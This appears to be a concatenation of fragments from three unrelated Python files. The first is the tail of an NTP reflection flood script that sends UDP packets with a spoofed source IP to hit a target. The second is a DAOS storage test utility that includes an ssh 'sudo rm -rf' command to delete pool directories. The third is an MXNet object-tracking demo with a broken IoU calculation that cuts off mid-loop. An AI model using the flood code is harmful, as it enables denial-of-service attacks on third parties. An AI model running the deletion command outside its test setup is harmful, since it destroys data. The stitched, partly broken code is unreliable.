packet = IP(dst = server, src = target_ip) / UDP(sport = random.randint(2000,65535), dport = int(target_port)) / Raw(load = payload)
send( packet, count = packets, verbose = False)
except Exception as e:
print(e)
else:
print("\033[1;34m"+"[*]"+"\033[0m"+" Sending " + str(packets) + " packets from NTP server: " + server + " to " + target + "...")
# Start threads
for thread in range(threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread) + "...")
t = Thread(target = ntp_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;33m"+"[!]"+"\033[0m"+" Attack completed.")
|
osa_utils.py
|
#!/usr/bin/python3
"""
(C) Copyright 2020-2022 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import ctypes
import queue
import time
import threading
import re
from avocado import fail_on
from ior_test_base import IorTestBase
from mdtest_test_base import MdtestBase
from exception_utils import CommandFailure
from pydaos.raw import (DaosContainer, IORequest,
DaosObj, DaosApiError)
from general_utils import create_string_buffer, run_command
class OSAUtils(MdtestBase, IorTestBase):
# pylint: disable=too-many-ancestors
"""
Test Class Description: This test runs
daos_server offline drain test cases.
:avocado: recursive
"""
def setUp(self):
"""Set up for test case."""
super().setUp()
self.pool_cont_dict = {}
self.container = None
self.obj = None
self.ioreq = None
self.dmg_command = self.get_dmg_command()
self.no_of_dkeys = self.params.get("no_of_dkeys", '/run/dkeys/*',
default=[0])[0]
self.no_of_akeys = self.params.get("no_of_akeys", '/run/akeys/*',
default=[0])[0]
self.record_length = self.params.get("length", '/run/record/*',
default=[0])[0]
self.ior_w_flags = self.params.get("write_flags", '/run/ior/iorflags/*',
default="")
self.ior_r_flags = self.params.get("read_flags", '/run/ior/iorflags/*')
self.server_count = len(self.hostlist_servers)
self.engine_count = self.server_managers[0].get_config_value(
"engines_per_host")
self.out_queue = queue.Queue()
self.dmg_command.exit_status_exception = False
self.test_during_aggregation = False
self.test_during_rebuild = False
self.test_with_checksum = True
# By default, test_with_rf is set to False.
# It is up to individual test to enable it.
self.test_with_rf = False
self.test_with_blank_node = False
self.test_with_snapshot = False
@fail_on(CommandFailure)
def get_pool_leader(self):
"""Get the pool leader.
Returns:
int: pool leader value
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return int(data["response"]["leader"])
@fail_on(CommandFailure)
def get_rebuild_status(self):
"""Get the rebuild status.
Returns:
str: rebuild status
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return data["response"]["rebuild"]["status"]
@fail_on(CommandFailure)
def get_rebuild_state(self):
"""Get the rebuild state.
Returns:
str: rebuild state
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return data["response"]["rebuild"]["state"]
@fail_on(CommandFailure)
def is_rebuild_done(self, time_interval,
wait_for_rebuild_to_complete=False):
"""Rebuild is completed/done.
Args:
time_interval: Wait interval between checks
wait_for_rebuild_to_complete: Rebuild completed
(Default: False)
"""
self.pool.wait_for_rebuild(wait_for_rebuild_to_complete,
interval=time_interval)
@fail_on(CommandFailure)
def assert_on_rebuild_failure(self):
"""If the rebuild is not successful,
raise assert.
"""
rebuild_status = self.get_rebuild_status()
self.log.info("Rebuild Status: %s", rebuild_status)
rebuild_failed_string = ["failed", "scanning", "aborted", "busy"]
self.assertTrue(rebuild_status not in rebuild_failed_string,
"Rebuild failed")
@fail_on(CommandFailure)
def print_and_assert_on_rebuild_failure(self, out, timeout=3):
"""Print the out value (daos, dmg, etc) and check for rebuild
completion. If not, raise assert.
"""
self.log.info(out)
self.is_rebuild_done(timeout)
self.assert_on_rebuild_failure()
@fail_on(CommandFailure)
def get_pool_version(self):
"""Get the pool version.
Returns:
int: pool_version_value
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return int(data["response"]["version"])
@fail_on(CommandFailure)
def get_ipaddr_for_rank(self, rank=None):
"""Obtain the IPAddress and port number for a
particular server rank.
Args:
rank (int): daos_engine rank. Defaults to None.
Returns:
ip_addr (str) : IPAddress for the rank.
port_num (str) : Port number for the rank.
"""
output = self.dmg_command.system_query()
members_length = self.server_count * self.engine_count
for i in range(0, members_length):
if rank == int(output["response"]["members"][i]["rank"]):
temp = output["response"]["members"][i]["addr"]
ip_addr = temp.split(":")
temp = output["response"]["members"][i]["fabric_uri"]
port_num = temp.split(":")
return ip_addr[0], port_num[2]
return None, None
@fail_on(CommandFailure)
def remove_pool_dir(self, ip_addr=None, port_num=None):
"""Remove the /mnt/daos[x]/<pool_uuid>/vos-* directory
Args:
ip_addr (str): IP address of the daos server.
Defaults to None.
port_number (str) : Port number the daos server.
"""
# Create the expected port list
# expected_ports = [port0] - Single engine/server
# expected_ports = [port0, port1] - Two engine/server
expected_ports = [engine_param.get_value("fabric_iface_port")
for engine_param in self.server_managers[-1].
manager.job.yaml.engine_params]
self.log.info("Expected ports : %s", expected_ports)
if ip_addr is None or port_num is None:
self.log.info("ip_addr : %s port_number: %s", ip_addr, port_num)
self.fail("No IP Address or Port number provided")
else:
if self.engine_count == 1:
self.log.info("Single Engine per Server")
cmd = "/usr/bin/ssh {} -oStrictHostKeyChecking=no \
sudo rm -rf /mnt/daos/{}/vos-*". \
format(ip_addr, self.pool.uuid)
elif self.engine_count == 2:
if port_num == str(expected_ports[0]):
port_val = 0
elif port_num == str(expected_ports[1]):
port_val = 1
else:
self.log.info("port_number: %s", port_num)
self.fail("Invalid port number")
cmd = "/usr/bin/ssh {} -oStrictHostKeyChecking=no \
sudo rm -rf /mnt/daos{}/{}/vos-*". \
format(ip_addr, port_val, self.pool.uuid)
else:
self.fail("Not supported engine per server configuration")
run_command(cmd)
def set_container(self, container):
"""Set the OSA utils container object.
Args:
container (obj) : Container object to be used
within OSA utils.
"""
self.container = container
def simple_osa_reintegrate_loop(self, rank, action="exclude",
loop_time=100):
"""This method performs exclude or drain and
reintegration on a rank for a certain amount of time.
Args:
rank (int): daos server rank.
action (str) : "exclude" or "drain".
Defaults to "exclude"
loop_time: Total time to perform drain/reintegrate
operation in a loop. (Default : 100 secs)
"""
start_time = 0
finish_time = 0
start_time = time.time()
while int(finish_time - start_time) < loop_time:
if action == "exclude":
output = self.dmg_command.pool_exclude(self.pool.uuid,
rank)
else:
output = self.dmg_command.pool_drain(self.pool.uuid,
rank)
self.print_and_assert_on_rebuild_failure(output)
output = self.dmg_command.pool_reintegrate(self.pool.uuid,
rank)
self.print_and_assert_on_rebuild_failure(output)
finish_time = time.time()
@fail_on(DaosApiError)
def write_single_object(self):
"""Write some data to the existing pool."""
self.pool.connect(2)
csum = self.params.get("enable_checksum", '/run/container/*')
self.container = DaosContainer(self.context)
input_param = self.container.cont_input_values
input_param.enable_chksum = csum
self.container.create(poh=self.pool.pool.handle,
con_prop=input_param)
self.container.open()
self.obj = DaosObj(self.context, self.container)
self.obj.create(objcls=1)
self.obj.open()
self.ioreq = IORequest(self.context,
self.container,
self.obj, objtype=4)
self.log.info("Writing the Single Dataset")
for dkey in range(self.no_of_dkeys):
for akey in range(self.no_of_akeys):
indata = ("{0}".format(str(akey)[0])
* self.record_length)
d_key_value = "dkey {0}".format(dkey)
c_dkey = create_string_buffer(d_key_value)
a_key_value = "akey {0}".format(akey)
c_akey = create_string_buffer(a_key_value)
c_value = create_string_buffer(indata)
c_size = ctypes.c_size_t(ctypes.sizeof(c_value))
self.ioreq.single_insert(c_dkey, c_akey, c_value, c_size)
self.obj.close()
self.container.close()
@fail_on(DaosApiError)
def verify_single_object(self):
"""Verify the container data on the existing pool."""
self.pool.connect(2)
self.container.open()
self.obj.open()
self.log.info("Single Dataset Verification -- Started")
for dkey in range(self.no_of_dkeys):
for akey in range(self.no_of_akeys):
indata = ("{0}".format(str(akey)[0]) *
self.record_length)
c_dkey = create_string_buffer("dkey {0}".format(dkey))
c_akey = create_string_buffer("akey {0}".format(akey))
val = self.ioreq.single_fetch(c_dkey,
c_akey,
len(indata) + 1)
if indata != (repr(val.value)[1:-1]):
self.d_log.error("ERROR:Data mismatch for "
"dkey = {0}, "
"akey = {1}".format(
"dkey {0}".format(dkey),
"akey {0}".format(akey)))
self.fail("ERROR: Data mismatch for dkey = {0}, akey={1}"
.format("dkey {0}".format(dkey),
"akey {0}".format(akey)))
self.obj.close()
self.container.close()
def prepare_cont_ior_write_read(self, oclass, flags):
"""This method prepares the containers for
IOR write and read invocations.
To enable aggregation:
- Create two containers and read always from
first container
Normal usage (use only a single container):
- Create a single container and use the same.
Args:
oclass (str): IOR object class
flags (str): IOR flags
"""
self.log.info(self.pool_cont_dict)
# If pool is not in the dictionary,
# initialize its container list to None
# {poolA : [None, None], [None, None]}
if self.pool not in self.pool_cont_dict:
self.pool_cont_dict[self.pool] = [None] * 4
# Create container if the pool doesn't have one.
# Otherwise, use the existing container in the pool.
# pool_cont_dict {pool A: [containerA, Updated,
# containerB, Updated],
# pool B : containerA, Updated,
# containerB, None]}
if self.pool_cont_dict[self.pool][0] is None:
self.add_container(self.pool, create=False)
self.set_cont_class_properties(oclass)
if self.test_with_checksum is False:
tmp = self.get_object_replica_value(oclass)
rf_value = "rf:{}".format(tmp - 1)
self.update_cont_properties(rf_value)
self.container.create()
self.pool_cont_dict[self.pool][0] = self.container
self.pool_cont_dict[self.pool][1] = "Updated"
else:
if ((self.test_during_aggregation is True) and
(self.pool_cont_dict[self.pool][1] == "Updated") and
(self.pool_cont_dict[self.pool][3] is None) and
("-w" in flags)):
# Write to the second container
self.add_container(self.pool, create=False)
self.set_cont_class_properties(oclass)
if self.test_with_checksum is False:
tmp = self.get_object_replica_value(oclass)
rf_value = "rf:{}".format(tmp - 1)
self.update_cont_properties(rf_value)
self.container.create()
self.pool_cont_dict[self.pool][2] = self.container
self.pool_cont_dict[self.pool][3] = "Updated"
else:
self.container = self.pool_cont_dict[self.pool][0]
def delete_extra_container(self, pool):
"""Delete the extra container in the pool.
Refer prepare_cont_ior_write_read. This method
should be called when OSA tests intend to
enable aggregation.
Args:
pool (object): pool handle
"""
self.pool.set_property("reclaim", "time")
extra_container = self.pool_cont_dict[pool][2]
extra_container.destroy()
self.pool_cont_dict[pool][3] = None
def get_object_replica_value(self, oclass):
""" Get the object replica value for an object class.
Args:
oclass (str): Object Class (eg: RP_2G1,etc)
Returns:
value (int) : Object replica value
"""
value = 0
if "_" in oclass:
replica_list = oclass.split("_")
value = replica_list[1][0]
else:
self.log.info("Wrong Object Class. Cannot split")
return int(value)
def update_cont_properties(self, cont_prop):
"""Update the existing container properties.
Args:
cont_prop (str): Replace existing container properties
with new value
"""
self.container.properties.value = cont_prop
def set_cont_class_properties(self, oclass="S1"):
"""Update the container class to match the IOR/Mdtest object
class. Fix the rf factor based on object replica value.
Also, remove the redundancy factor for S type
object class.
Args:
oclass (str, optional): Container object class to be set.
Defaults to "S1".
"""
self.container.oclass.value = oclass
# Set the container properties properly for S!, S2 class.
# rf should not be set to 1 for S type object class.
x = re.search("^S\\d$", oclass)
prop = self.container.properties.value
if x is not None:
prop = prop.replace("rf:1", "rf:0")
else:
tmp = self.get_object_replica_value(oclass)
rf_value = "rf:{}".format(tmp - 1)
prop = prop.replace("rf:1", rf_value)
self.container.properties.value = prop
# Over-write oclass settings if using redundancy factor
# and self.test_with_rf is True.
# This has to be done so that container created doesn't
# use the object class.
if self.test_with_rf is True and \
"rf" in self.container.properties.value:
self.log.info(
"Detected container redundancy factor: %s",
self.container.properties.value)
self.ior_cmd.dfs_oclass.update(None, "ior.dfs_oclass")
self.ior_cmd.dfs_dir_oclass.update(None, "ior.dfs_dir_oclass")
self.container.oclass.update(None)
def assert_on_exception(self, out_queue=None):
"""Assert on exception while executing an application.
Args:
out_queue (queue): Check whether the queue is
empty. If empty, app (ior, mdtest) didn't encounter error.
"""
if out_queue is None:
out_queue = self.out_queue
if out_queue.empty():
pass
else:
exc = out_queue.get(block=False)
out_queue.put(exc)
raise CommandFailure(exc)
def cleanup_queue(self, out_queue=None):
"""Cleanup the existing thread queue.
Args:
out_queue (queue): Queue to cleanup.
"""
if out_queue is None:
out_queue = self.out_queue
while not out_queue.empty():
out_queue.get(block=True)
def run_ior_thread(self, action, oclass, test, single_cont_read=True,
fail_on_warning=True, pool=None):
"""Start the IOR thread for either writing or
reading data to/from a container.
Args:
action (str): Start the IOR thread with Read or
Write
oclass (str): IOR object class
test (list): IOR test sequence
flags (str): IOR flags
single_cont_read (bool) : Always read from the
1st container.
Defaults to True.
fail_on_warning (bool) : Test terminates
for IOR warnings.
Defaults to True.
pool (TestPool): Pool to run ior on. Defaults to None.
"""
# Intermediate (between correct and hack) implementation for allowing a
# pool to be passed in. Needs to be fixed by making the pool argument
# required.
if pool is None:
pool = self.pool
self.cleanup_queue()
if action == "Write":
flags = self.ior_w_flags
else:
flags = self.ior_r_flags
# Add a thread for these IOR arguments
process = threading.Thread(target=self.ior_thread,
kwargs={"pool": pool,
"oclass": oclass,
"test": test,
"flags": flags,
"single_cont_read":
single_cont_read,
"fail_on_warning":
fail_on_warning})
# Launch the IOR thread
process.start()
# Wait for the thread to finish
process.join()
if not self.out_queue.empty():
self.assert_on_exception()
def ior_thread(self, pool, oclass, test, flags,
single_cont_read=True,
fail_on_warning=True):
"""Start an IOR thread.
Args:
pool (object): pool handle
oclass (str): IOR object class, container class.
test (list): IOR test sequence
flags (str): IOR flags
single_cont_read (bool) : Always read from the
1st container.
Defaults to True.
fail_on_warning (bool) : Test terminates
for IOR warnings.
Defaults to True.
"""
self.cleanup_queue()
self.pool = pool
self.ior_cmd.get_params(self)
self.ior_cmd.set_daos_params(self.server_group, self.pool)
self.log.info("Redundancy Factor : %s", self.test_with_rf)
self.ior_cmd.dfs_oclass.update(oclass)
self.ior_cmd.dfs_dir_oclass.update(oclass)
if single_cont_read is True:
# Prepare the containers created and use in a specific
# way defined in prepare_cont_ior_write.
self.prepare_cont_ior_write_read(oclass, flags)
elif single_cont_read is False and self.container is not None:
# Here self.container is having actual value. Just use it.
self.log.info(self.container)
else:
self.fail("Not supported option on ior_thread")
try:
job_manager = self.get_ior_job_manager_command()
except CommandFailure as err_msg:
self.out_queue.put(err_msg)
self.assert_on_exception()
job_manager.job.dfs_cont.update(self.container.uuid)
self.ior_cmd.transfer_size.update(test[2])
self.ior_cmd.block_size.update(test[3])
self.ior_cmd.flags.update(flags)
# Update oclass settings if using redundancy factor
# and self.test_with_rf is True.
if self.test_with_rf is True and \
"rf" in self.container.properties.value:
self.log.info(
"Detected container redundancy factor: %s",
self.container.properties.value)
self.ior_cmd.dfs_oclass.update(None, "ior.dfs_oclass")
self.ior_cmd.dfs_dir_oclass.update(None, "ior.dfs_dir_oclass")
self.run_ior_with_pool(create_pool=False, create_cont=False,
fail_on_warning=fail_on_warning,
out_queue=self.out_queue)
if not self.out_queue.empty():
self.assert_on_exception()
def run_mdtest_thread(self, oclass="RP_2G1"):
"""Start mdtest thread and wait until thread completes.
Args:
oclass (str): IOR object class, container class.
"""
# Create container only
self.mdtest_cmd.dfs_destroy = False
create_container = 0
if self.container is None:
self.add_container(self.pool, create=False)
create_container = 1
self.mdtest_cmd.dfs_oclass.update(oclass)
self.set_cont_class_properties(oclass)
if self.test_with_checksum is False:
tmp = self.get_object_replica_value(oclass)
rf_value = "rf:{}".format(tmp - 1)
self.update_cont_properties(rf_value)
if create_container == 1:
self.container.create()
job_manager = self.get_mdtest_job_manager_command(self.manager)
job_manager.job.dfs_cont.update(self.container.uuid)
# Add a thread for these IOR arguments
process = threading.Thread(target=self.execute_mdtest)
# Launch the MDtest thread
process.start()
# Wait for the thread to finish
process.join()
if not self.out_queue.empty():
self.assert_on_exception()
|
mul_f.py
|
from __future__ import print_function
import argparse
import os
import cv2
import time
import mxnet as mx
import numpy as np
from rcnn.config import config
from rcnn.symbol import get_vggm_test, get_vggm_rpn_test
from rcnn.symbol import get_vgg_test, get_vgg_rpn_test
from rcnn.symbol import get_resnet_test
from rcnn.io.image import resize, transform
from rcnn.core.tester import Predictor, im_detect, im_proposal, vis_all_detection, draw_all_detection
from rcnn.utils.load_model import load_param
from rcnn.processing.nms import py_nms_wrapper, cpu_nms_wrapper, gpu_nms_wrapper
import cv2
import sys
import multiprocessing
from time import time
import Queue
import kcftracker
CLASSES = ('__background__',
'car', 'coach', 'truck', 'person', 'tanker')
config.TEST.HAS_RPN = True
SHORT_SIDE = config.SCALES[0][0]
LONG_SIDE = config.SCALES[0][1]
PIXEL_MEANS = config.PIXEL_MEANS
DATA_NAMES = ['data', 'im_info']
LABEL_NAMES = None
DATA_SHAPES = [('data', (1, 3, LONG_SIDE, SHORT_SIDE)), ('im_info', (1, 3))]
LABEL_SHAPES = None
# visualization
CONF_THRESH = 0.5
NMS_THRESH = 0.3
nms = py_nms_wrapper(NMS_THRESH)
def get_net(symbol, prefix, epoch, ctx):
arg_params, aux_params = load_param(prefix, epoch, convert=True, ctx=ctx, process=True)
# infer shape
data_shape_dict = dict(DATA_SHAPES)
arg_names, aux_names = symbol.list_arguments(), symbol.list_auxiliary_states()
arg_shape, _, aux_shape = symbol.infer_shape(**data_shape_dict)
arg_shape_dict = dict(zip(arg_names, arg_shape))
aux_shape_dict = dict(zip(aux_names, aux_shape))
# check shapes
for k in symbol.list_arguments():
if k in data_shape_dict or 'label' in k:
continue
assert k in arg_params, k + ' not initialized'
assert arg_params[k].shape == arg_shape_dict[k], \
'shape inconsistent for ' + k + ' inferred ' + str(arg_shape_dict[k]) + ' provided ' + str(
arg_params[k].shape)
for k in symbol.list_auxiliary_states():
assert k in aux_params, k + ' not initialized'
assert aux_params[k].shape == aux_shape_dict[k], \
'shape inconsistent for ' + k + ' inferred ' + str(aux_shape_dict[k]) + ' provided ' + str(
aux_params[k].shape)
predictor = Predictor(symbol, DATA_NAMES, LABEL_NAMES, context=ctx,
provide_data=DATA_SHAPES, provide_label=LABEL_SHAPES,
arg_params=arg_params, aux_params=aux_params)
return predictor
def generate_batch(im):
"""
preprocess image, return batch
:param im: cv2.imread returns [height, width, channel] in BGR
:return:
data_batch: MXNet input batch
data_names: names in data_batch
im_scale: float number
"""
im_array, im_scale = resize(im, SHORT_SIDE, LONG_SIDE)
im_array = transform(im_array, PIXEL_MEANS)
im_info = np.array([[im_array.shape[2], im_array.shape[3], im_scale]], dtype=np.float32)
data = [mx.nd.array(im_array), mx.nd.array(im_info)]
data_shapes = [('data', im_array.shape), ('im_info', im_info.shape)]
data_batch = mx.io.DataBatch(data=data, label=None, provide_data=data_shapes, provide_label=None)
return data_batch, DATA_NAMES, im_scale
detect_num = {c: 0 for c in CLASSES}
tp, fp, fn = 0, 0, 0
gp, gr, gf1 = 0, 0, 0
def iou(rect1, rect2):
iou = 0
if rect1[0] < rect2[2] and rect1[2] > rect2[0] and rect1[1] < rect2[3] and rect1[3] > rect2[1]:
i = (min(rect1[2], rect2[2]) - max(rect1[0], rect2[0])) * (min(rect1[3], rect2[3]), max(rect1[1], rect2[1]))
o = (rect1[2] - rect1[0]) * (rect1[3] - rect1[1]) + (rect2[2] - rect2[0]) * (rect2[3] - rect2[1]) - i
iou = i / o
return iou
def demo_net(predictor, image_name, image, with_label, vis, out_dir, label_dir):
"""
generate data_batch -> im_detect -> post process
:param predictor: Predictor
:param image_name: image name
:param vis: will save as a new image if not visualized
:return: None
"""
global detect_num
global tp, fp, fn
global gp, gr, gf1
if (type(image_name)==str):
assert os.path.exists(image_name), image_name + ' not found'
im = cv2.imread(image_name)
else:
im = image
# im = cv2.flip(im, 1)
data_batch, data_names, im_scale = generate_batch(im)
# for i in range(10):
# scores, boxes, data_dict = im_detect(predictor, data_batch, data_names, im_scale)
for i in range(1):
scores, boxes, data_dict = im_detect(predictor, data_batch, data_names, im_scale)
xn = []
yn = []
wn = []
hn = []
all_boxes = [[] for _ in CLASSES]
for cls in CLASSES:
cls_ind = CLASSES.index(cls)
cls_boxes = boxes[:, 4 * cls_ind:4 * (cls_ind + 1)]
cls_scores = scores[:, cls_ind, np.newaxis]
keep = np.where(cls_scores >= CONF_THRESH)[0]
dets = np.hstack((cls_boxes, cls_scores)).astype(np.float32)[keep, :]
keep = nms(dets)
all_boxes[cls_ind] = dets[keep, :]
boxes_this_image = [[]] + [all_boxes[j] for j in range(1, len(CLASSES))]
# print(boxes_this_image)
# print results
rst = {};
lfn, lfp, ltp = 0, 0, 0
#print('class ---- [[x1, x2, y1, y2, confidence]]')
for ind, boxes in enumerate(boxes_this_image):
if len(boxes) > 0:
#print('---------', CLASSES[ind], '---------')
#print(boxes)
for i in range(0, len(boxes)):
xn.append(int(boxes[i][0] + 0))
yn.append(int(boxes[i][1] + 0))
wn.append(int(boxes[i][2] - boxes[i][0]))
hn.append(int(boxes[i][3] - boxes[i][1]))
#rst[CLASSES[ind]] = [box for box in boxes]
# detect_num[CLASSES[ind]] += len(boxes)
#detect_num[CLASSES[ind]] += 1 # len(boxes)
"""if image == '' and with_label:
label_file = os.path.join(label_dir, os.path.split(image_name.replace('.jpg', '.txt'))[1])
with open(label_file) as fd:
for line in fd:
cls, poss = line.split(':')
x1, y1, x2, y2 = [float(item) for item in poss.split(',')]
if cls not in rst:
lfn += 1
continue
iou_thd = 0.5
now_iou = 0
now_idx = 0
for ind, box in enumerate(rst[cls]):
# print('box = ', box, type(box))
# print('box = {}, true = {}'.format(box, (x1, y1, x2, y2)))
if (box[0] >= x2) or (box[2] <= x1) or (box[1] >= y2) or (box[3] <= y1):
continue
else:
# print('###############################################')
i = (min(x2, box[2]) - max(x1, box[0])) * (min(y2, box[3]) - max(y1, box[1]))
assert (i > 0)
u = (x2 - x1) * (y2 - y1) + (box[0] - box[2]) * (box[1] - box[3]) - i
if i / u > now_iou:
now_iou = i / u
now_idx = ind
if now_iou > iou_thd:
ltp += 1
rst[cls].pop(now_idx)
if len(rst[cls]) == 0: rst.pop(cls)
else:
lfn += 1
for vs in rst.values():
lfp += len(vs)
p, r, f1 = 0, 0, 0
if ltp != 0:
p = 100.0 * ltp / (ltp + lfp)
r = 100.0 * ltp / (ltp + lfn)
f1 = 2 * p * r / (p + r)
print('precision = {}%, recall = {}%, f1 score = {}%'.format(p, r, f1))
tp += ltp
fp += lfp
fn += lfn
gp += p
gr += r
gf1 += f1"""
"""if vis:
vis_all_detection(data_dict['data'].asnumpy(), boxes_this_image, CLASSES, im_scale)
else:
# print(os.path.join(args.out_dir, os.path.split(image_name.replace('.jpg', '_result.jpg'))[1]))
# result_file = os.path.join(out_dir, os.path.split(image_name.replace('.jpg', '_result.jpg'))[1])
result_file = os.path.join(out_dir, os.path.split('_result.jpg')[1])
print('results saved to %s' % result_file)
im = draw_all_detection(data_dict['data'].asnumpy(), boxes_this_image, CLASSES, im_scale)
cv2.imwrite(result_file, im)"""
# print(type(xn))
return xn, yn, wn, hn
"""def parse_args():
parser = argparse.ArgumentParser(description='Demonstrate a Faster R-CNN network')
parser.add_argument('--image', help='custom image', default='', type=str)
parser.add_argument('--prefix', help='saved model prefix', type=str)
parser.add_argument('--epoch', help='epoch of pretrained model', type=int)
parser.add_argument('--gpu', help='GPU device to use', default=0, type=int)
parser.add_argument('--vis', help='display result', action='store_true')
parser.add_argument('--network', help='display result', default='vgg', type=str)
parser.add_argument('--in_dir', type=str, default='.')
parser.add_argument('--test', type=str, default='.')
parser.add_argument('--out_dir', type=str, default='.')
parser.add_argument('--label_dir', type=str, default='.')
parser.add_argument('--with_label', type=int, default=1)
args = parser.parse_args()
return args"""
def compare(x, y):
DIR='video_output/'
stat_x = os.stat(DIR + "/" + x)
stat_y = os.stat(DIR + "/" + y)
if stat_x.st_ctime < stat_y.st_ctime:
return -1
elif stat_x.st_ctime > stat_y.st_ctime:
return 1
else:
return 0
def main(predictor,ctx,image, prefix, epoch, gpu, vis, network, in_dir, test, out_dir, label_dir, with_label):
global tp, fp, fn, detect_num
# args = parse_args()
# if args.network == 'vgg':
# symbol = get_vgg_test(num_classes=config.NUM_CLASSES, num_anchors=config.NUM_ANCHORS)
# elif args.network == 'vggm':
#symbol = eval('get_' + network + '_test')(num_classes=config.NUM_CLASSES, num_anchors=config.NUM_ANCHORS)
#predictor = get_net(symbol, prefix, epoch, ctx)
if in_dir=='':
x = []
y = []
w = []
h = []
"""result = []
pool = multiprocessing.Pool(processes=len(image))
for i in range(0, len(image)):
result.append(pool.apply_async(demo_net, (predictor, image[i], image[i], with_label, vis, out_dir,
label_dir)))
print(result)
for i in range(0, len(result)):
res = result[i].get()
x.append(res[0])
y.append(res[1])
w.append(res[2])
h.append(res[3])
pool.close()
pool.join()"""
a=image.qsize()
for i in range (0,a):
img=image.get()
x1, y1, w1, h1 = demo_net(predictor,img, img, with_label, vis, out_dir,
label_dir)
x.append(x1)
y.append(y1)
w.append(w1)
h.append(h1)
else:
if image != '':
return demo_net(predictor, image, image, with_label, vis, out_dir, label_dir)
else:
# t0 = time.clock()
# print(os.listdir(in_dir), in_dir)
num = 0
# with open(test) as fd:
# test_imgs = set([n.strip() + '.jpg' for n in fd.readlines()])
iterms = os.listdir(in_dir)
iterms.sort(compare)
# for iterm in iterms:
# print(iterm)
imgs = [img for img in iterms]
print(imgs)
# for image in [ img for img in os.listdir(in_dir) if not os.path.isdir(img) and not img.count('_result.')]:
x = []
y = []
w = []
h = []
for image in imgs:
print(os.path.join(in_dir, image))
x1, y1, w1, h1 = demo_net(predictor, os.path.join(in_dir, image), image, with_label, vis, out_dir,
label_dir)
x.append(x1)
y.append(y1)
w.append(w1)
h.append(h1)
"""num += 1
if with_label:
p = 100.0 * tp / (tp + fp)
r = 100.0 * tp / (tp + fn)
f1 = 2.0 * p * r / (p + r)
print(
'type 1#: avg precision = {}%, avg recall = {}%, avg f1 score = {}% (with tp = {}, fp = {}, fn = {})'.format(
p, r, f1, tp, fp, fn))
print(
'type 2#: avg precision = {}%, avg recall = {}%, avg f1 score = {}%'.format(gp / num, gr / num, gf1 / num))
print(time.clock() - t0, '(with {} samples, detects {} objects)'.format(num, detect_num))"""
return x,y,w,h
selectingObject = False
# initTracking = False
initTracking = True
onTracking = False
ix, iy, cx, cy = 0, 0, -1, -1
w, h = 0, 0
inteval = 1
duration = 0.04
# mouse callback function
def draw_boundingbox(event, x, y, flags, param):
global selectingObject, initTracking, onTracking, ix, iy, cx, cy, w, h
if event == cv2.EVENT_LBUTTONDOWN:
selectingObject = True
onTracking = False
ix, iy = x, y
cx, cy = x, y
elif event == cv2.EVENT_MOUSEMOVE:
cx, cy = x, y
elif event == cv2.EVENT_LBUTTONUP:
selectingObject = False
if (abs(x - ix) > 10 and abs(y - iy) > 10):
w, h = abs(x - ix), abs(y - iy)
ix, iy = min(x, ix), min(y, iy)
initTracking = True
else:
onTracking = False
elif event == cv2.EVENT_RBUTTONDOWN:
onTracking = False
if (w > 0):
ix, iy = x - w / 2, y - h / 2
initTracking = True
def Tracking(trackers, frame):
boundingbox = trackers.update(frame)
boundingbox = map(int, boundingbox)
return boundingbox,trackers
def Renew(x,y,w,h,box):
#print(x,y,w,h)
#print(box)
if len(x)!=len(box):
#print ("renew")
return True
for i in range(len(x)):
if(abs(x[i]-box[i][0])/float(box[i][0])>0.05 or abs(y[i]-box[i][1])/float(box[i][1])>0.05 ):
#print("renew")
return True
#print("remain")
return False
def video(name,ctx):
inteval = 1
duration = 0.01
global selectingObject, initTracking, onTracking, ix, iy, cx, cy, w, h
show_delay=24
network_inteval=8
start = True
store = True
cap = cv2.VideoCapture(name)
t3=time()
video = Queue.Queue(maxsize = show_delay)
k = 0
cn = 0
ct = 0
gpu = 0
renew=True
capture=Queue.Queue(maxsize=show_delay/network_inteval)
cv2.namedWindow('tracking')
cv2.setMouseCallback('tracking', draw_boundingbox)
network='vggm'
prefix='model/e2e'
epoch=20
symbol = eval('get_' + network + '_test')(num_classes=config.NUM_CLASSES, num_anchors=config.NUM_ANCHORS)
predictor = get_net(symbol, prefix, epoch, ctx)
while (cap.isOpened()or ct!=cn):
ret, frame = cap.read()
if store:
video.put(frame)
if(k%network_inteval==0):
capture.put(frame)
k = k + 1
cn = cn + 1
if k==show_delay:
store=False
else:
if start:
timer = 0
cnt=0
start = False
if not ret:
cap.release()
#break very slow if cap not released
if (selectingObject):
cv2.rectangle(frame, (ix, iy), (cx, cy), (0, 255, 255), 1)
elif (initTracking):
n=[]
x=[]
y=[]
w=[]
h=[]
t5=time()
x1, y1, w1, h1 = main(predictor,ctx,capture, prefix='model/e2e', epoch=20, gpu=0, vis=False, network='vggm',
in_dir='', test='test.txt', out_dir='output/',
label_dir='data/hcar/Annotations/', with_label=1)
t6=time()
print (t6-t5)
for i in range (0,len(x1)):
x.append(x1[i])
y.append(y1[i])
w.append(w1[i])
h.append(h1[i])
n.append(len(x1[i]))
initTracking = False
onTracking = True
elif (onTracking):
ct += 1
timer += 1
t0 = time()
show=video.get()
#if (t%network_inteval==0 and Renew(x[t/network_inteval],y[t/network_inteval],w[t/network_inteval],h[t/network_inteval],box)):
if (timer==1 and renew):
j=cnt
trackers={}
length=n[j]
box=[]
if(length!=0):
pool = multiprocessing.Pool(processes=length)
for i in range(0, length):
ix = x[j][i]
iy = y[j][i]
iw = w[j][i]
ih = h[j][i]
cv2.rectangle(show, (ix, iy), (ix + iw, iy + ih), (0, 255, 255), 2)
tracker = kcftracker.KCFTracker(True, True, True) # hog, fixed_window, multiscale
tracker.init([ix, iy, iw, ih], show)
trackers[i] = tracker
box.append(0)
#elif(t%network_inteval==0):
#pool = multiprocessing.Pool(processes=length)
result = []
for i in range(0, length):
result.append(pool.apply_async(Tracking, (trackers[i], show)))
for i in range(0, length):
res = result[i].get()
trackers[i]=res[1]
#print(res[0][0],res[0][1],res[0][2],res[0][3])
box[i]=res[0]
cv2.rectangle(show, (res[0][0], res[0][1]),
(res[0][0] + res[0][2], res[0][1] + res[0][3]), (0, 255, 255), 1)
t1 = time()
